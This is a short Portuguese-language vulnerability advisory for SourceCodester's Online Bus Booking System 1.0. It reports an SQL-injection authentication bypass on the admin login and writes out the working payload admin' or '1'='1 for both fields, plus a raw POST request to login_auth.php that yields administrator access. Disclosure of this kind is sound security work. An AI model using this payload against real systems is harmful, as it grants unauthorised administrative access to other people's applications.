
Online Bus Booking System 1.0, há bypass de autenticação na tela de Login do Admin em admin.php via injeção de SQL no nome de usuário ou senha.
Online Bus Booking System 1.0, existe bypass de autenticação na tela de Login do Admin em admin.php via injeção SQL no nome de usuário ou senha.
#Fornecedor - SourceCodester
#Produto -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0
#Tipo de Vulnerabilidade - Bypass de Autenticação
#Componente Afetado - bus_booking/admin.php
#Tipo de Ataque - Local
#Escalação de Privilégio - true
#Impacto Execução de código - true
Vetor de Ataque
Vá ao Painel de Login do Admin e tente fazer bypass
No payload da requisição, defina
username : admin' or '1'='1
password : admin' or '1'='1
POST /bus_booking/login_auth.php HTTP/1.1
Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
Logado com sucesso no Painel do Administrador